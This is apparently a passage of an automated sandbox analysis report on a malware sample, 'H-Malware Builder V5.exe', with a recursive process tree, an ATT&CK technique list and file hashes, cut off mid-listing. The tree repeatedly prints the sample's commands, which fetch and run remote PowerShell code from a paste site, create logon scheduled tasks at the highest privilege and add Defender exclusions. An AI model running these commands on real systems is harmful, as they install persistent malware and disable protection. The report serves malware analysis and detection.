        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        50⤵
        
        PID:2724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        51⤵
        
        PID:2024
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        50⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1972
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        50⤵
        
        PID:1160
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        49⤵
        
        PID:2352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1056
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        50⤵
        
        PID:1788
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        51⤵
        
        PID:2252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        52⤵
        
        PID:1488
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        51⤵
        
        PID:944
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        51⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        50⤵
        
        PID:3028
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:916
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        51⤵
        
        PID:764
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        52⤵
        
        PID:2892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        53⤵
        
        PID:1892
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        52⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2072
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        52⤵
        
        PID:344
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        51⤵
        
        PID:536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        52⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1488
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        52⤵
        
        PID:952
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        53⤵
        
        PID:2488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        54⤵
        
        PID:2712
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        53⤵
        
        PID:2692
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        53⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1736
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        52⤵
        
        PID:1888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        53⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2164
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        53⤵
        
        PID:1660
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        54⤵
        
        PID:1108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        55⤵
        
        PID:1104
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        54⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3064
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        54⤵
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        53⤵
        
        PID:2104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        54⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1100
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        54⤵
        
        PID:2164
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        55⤵
        
        PID:1872
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        56⤵
        
        PID:2400
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        55⤵
        
        PID:764
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        55⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        54⤵
        
        PID:2496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        55⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1324
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        55⤵
        
        PID:2136
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        56⤵
        
        PID:696
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        57⤵
        
        PID:1656
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        56⤵
        
        PID:2664
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        56⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1736
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        55⤵
        
        PID:2348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2060
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        56⤵
        
        PID:1524
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        57⤵
        
        PID:2792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        58⤵
        
        PID:3064
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        57⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2560
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        57⤵
        
        PID:524
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        56⤵
        
        PID:2252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        57⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1656
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        57⤵
        
        PID:404
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        58⤵
        
        PID:2816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        59⤵
        
        PID:2576
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        58⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2240
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        58⤵
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        57⤵
        
        PID:1324

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1148630339-2115133731882329564-1198094365921807718-927877125-761127299-654835012"
1⤵
PID:2204

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1589188834-1319720591-1535983953185590643-2066403464758513425-2054759248-908811592"
1⤵
PID:2268

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2095712675-1145232752-810106205146167147582123495-848145907303084164566017271"
1⤵
PID:1788

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1960997546-2023792113558916544-1601382214-11414286081283525408467926293440030856"
1⤵
PID:2660

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "7427709841849571022-14715089341048560924-1458766512127351160-593765425920495115"
1⤵
PID:2120

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "711229127-1644102459-1008190067-338783930-547488188-748481682-1473789893-1725495857"
1⤵
PID:1720

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1060577480196988526-324604273-20216904365079144-1767007724-16512382531218857266"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1484

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-20045686451077142216-17356995752077426100-1926780308-417208753572703934-1347943978"
1⤵
PID:2148

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-360990709-169577764-20521129446827425711427936366-1834282674527680280409241202"
1⤵
PID:292

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "13914415201393450817-14958533392079668866-510082124-1182458924-1389077261343906491"
1⤵
PID:2464

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-24509961065617613862853442-18594101011541558547420016371781170285-1388489039"
1⤵
PID:2288

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "59433180212237173471888582425-20018440071206940145-10138625112556979171767005923"
1⤵
PID:1172

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-84422629914009816313134929281733411751-220671405725166103116320761590751299"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2880

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19676302221023873485-1577653064179942367621098241-1916502675-1687573490517692823"
1⤵
PID:2724

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1079495746-2045336545-629018513-928949841-847688572-1997896052-1789358914662628444"
1⤵
- Suspicious use of SetWindowsHookEx
PID:3028

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-7291351881457722938-1407757361-1721853666737446867-10894285271306323637-1816519176"
1⤵
PID:2252

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "12560135402040154278-778876517-1911644680-111490307669893047-2052721179626479824"
1⤵
PID:2020

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "795078162-19141947461484832532197563911122372011-972855892-28691404-1592589862"
1⤵
PID:344

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1785241073-1103502894671790261-1286564120-187005580654751805-1498115386361845335"
1⤵
PID:2792

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-312514620-8334950111726781432937640601191295734-2046738181-1025042171758285662"
1⤵
PID:2172

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-4015018074473624141429891696-12862662251599180919-1012401082-2094125446555142254"
1⤵
- Suspicious use of SetWindowsHookEx
PID:844

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "376226030-4176011362004107935-651825425-13925938641314454483651292354774530442"
1⤵
PID:2504

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10112496081294177930-135974608-6795096201928299401-12976364525395994661427726055"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1552

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-8751782653302246-7764828951924480403-1351212661-997105623-54696480-1144603841"
1⤵
PID:2212

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "592308046-170799808215048753696459198775301396221288870890-510554190265147329"
1⤵
PID:1776

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "16378449491960952733-16403513751665438839-19452264281685399670173299180436794440"
1⤵
PID:2548

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1787874859-5658893952090127409551507189410697629-1413533648-8050347301863961503"
1⤵
- Suspicious use of SetWindowsHookEx
PID:1256

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19598725022043598013-21452474501109475634-353296725181199044589467493337866156"
1⤵
PID:1788

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-6005288211706868928-944155752-851911005-8767711961113678146584855771427138446"
1⤵
PID:1060

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-794992729-1643590192-62633119211876643955720402011455514742-1828948520-1340829250"
1⤵
PID:2732

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-89783946-1602023650-794691263-829040480-3242101501233760698799542824589602329"
1⤵
PID:2388

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-993424113-168014621641105685-88545357112598885587025214251495155629413751434"
1⤵
PID:2492

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "426702236884927560-1927778163853747946-104179959416324792371633717261-1611711508"
1⤵
PID:2392

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-174055335156007446929606905757332500744866810172024351120756158421471739071"
1⤵
PID:2468

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1316058169-783744446-828534582136967088912980756821253281433-482098693305519118"
1⤵
PID:2984

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "372633434-1754519048-302044688179725226-128260045956664088-573097860-273816545"
1⤵
PID:2352

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1208325698493231115578916131-1162988420-378079526-1602093768-1195196055-406634795"
1⤵
- Suspicious use of SetWindowsHookEx
PID:3008

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1851182522-17537505591208449311807559679-1887368298-67713293610381554842080243904"
1⤵
PID:2720

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "17587328201623847290-1233505863-2093478290-720030969-658285082-1157724519-1026099766"
1⤵
PID:2112

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "927972032-151819447550751899-32283399611197222471011487589-21052735781406481653"
1⤵
PID:1980

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-150462132472668065-7879683875896067791507565237213276921929640332-763134346"
1⤵
PID:1016

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "12859191012225097641047895799-1950838517-176008187-701337578696594380197967260"
1⤵
PID:2596

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2144164790143201963-4202475211627317564-140573985163306650263966434-885431584"
1⤵
PID:1656

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "433654934-1195512180-131078480515851005281735761626598564042343882038-1825813815"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2220

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "108310747821209405769086137341553913509758599941769440800-1991127898865072908"
1⤵
PID:1764

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-44447443316049297221847226228791471129-749956572411491118282504347-71531886"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2032

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-5664834261216181142182084254207965763-1423544300-1699330894988990900-1832828865"
1⤵
PID:1900

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1579052285-11842691201920814307-2105466010695283691347091361-20066906291229658413"
1⤵
PID:2444

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "95150983012118175101667802862-14374028799492613961417289120-15777218301924281144"
1⤵
PID:1828

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-788745692-2031308508-1339908682-88960339712391641601240397229-1148434957-788310400"
1⤵
PID:2140

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2016234459117848958011933589916655599651352327567-6068022151389869632-1658564217"
1⤵
PID:3028

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1325778881-1836094574-6659060246264413351763345807-1239279876-197974698-549649388"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2656

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-108815624817257658581848755278-12192926191609184956-16314294591410534391-751669963"
1⤵
PID:952

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-323220138-205849042410823464041287468773-2094842403-1299184071-143380072840250483"
1⤵
PID:2624

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-5051239462129747343177380901-19893962671687882337952789505-1977108036329972477"
1⤵
PID:1760

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-158010967-857783673-44999275324850852-1987897292781095775292636929-721771654"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2952

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1484142394-70194249243634513-130799501589582688-325802967-1758389983-1462636886"
1⤵
PID:1500

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-923940864-356216326-694752577-680736544-125773922219762617771299016628-1110828172"
1⤵
PID:2588

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1553847571-729654137144822374-18820364311019756435-94876671448297589-494464653"
1⤵
PID:2364

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1088146041-169502484967239130816097077621027741203-16417564511329226065463395050"
1⤵
PID:2816

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "149925069514178562514802454124323375208387322802081857543-18096413201471430875"
1⤵
PID:2732

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-641207765-642422764-966533260-1681269073-287798792-232018927-13129486451762363434"
1⤵
PID:1992

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "16438667211441883207328706023439934022405093619198732899318583414591807397954"
1⤵
PID:2468

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-7821304711654477086-7717004551361595778214579-13001321051178387270-131467954"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2736

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-282192797827971960822804347312473082-609718563-12854409371888868839564988928"
1⤵
PID:3008

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-467054518-319873649133245118710677337981881303147-2030126713-409830198651269730"
1⤵
PID:2144

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-605755018-137193321-17329500451036231051928898898-1009171234135655051-96006659"
1⤵
PID:1828

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "723199066-2049046107479912495-1986052086-1343263623-6407607879399231181985157430"
1⤵
PID:1508

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "188879506312954443021863787587295220-77960064910690693861510418467273817958"
1⤵
PID:2560

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10314591876893358001708777473892792660866745471-781177186-669028952-2069422326"
1⤵
PID:1620

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1980966151569709191903145122-784415738451729313-1300996944213761703-336382775"
1⤵
PID:2440

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "5873488912742720631781712413-889603888171771313312794613271283186464-1552525466"
1⤵
PID:1512

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-137207659-1134432684-2132768235220123299589641148-18925901059127554451050601739"
1⤵
PID:2824

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-372336929-1095147590-266695473-21359967442129295485-30151922-849109063-2068124855"
1⤵
PID:1664

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-273127307-1436157371-1354000001637706626340318427606597521-500972672187011812"
1⤵
PID:2124

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "129376748-201776646114079570551533459247-1209642987335515550-1822361246-1778487983"
1⤵
PID:2952

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "343198526-172076913120746708935365275151627916761771913551434459675-1327089976"
1⤵
PID:1828

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2024872371-1673268394-650853160164396921614204119581361446318-904401801-236653013"
1⤵
PID:1628

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-915744127-845725628-207315712717906068261974078899209014240214174471721710422512"
1⤵
PID:3004

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1416545741-325653734-1701948474702788822-772011041291250974-10317623621132607281"
1⤵
PID:1076

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "214489506663424139620344925849504424121555200516-136592028314445562001230430133"
1⤵
PID:1220

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "121509032499944357719539858061408104341584620589-846541893949833686906520873"
1⤵
PID:2540

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
189274f5e6b217aa5d75fab8a744a9cb

SHA1
7e59b6f30dc8be269d1e92a3f9edcf361c7d0d1d

SHA256
f5a6122056114a837936c4a47088d6543e9c4006643be6aa5044d933fa3c7759

SHA512
de9535a7b5f01f8cc7635628914240c592d7c217d5eb84061ffe0444f05b00fee65da0231ffbe0368c45d6c1e07fce90d5e6e8ab2c12d7e28c73b7ffe5abb21d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe

Filesize
290KB

MD5
cc63633edfcc147cbaed1959b03d8730

SHA1
df7a250eba6ee1767b09f7923bfd735635deb9e8

SHA256
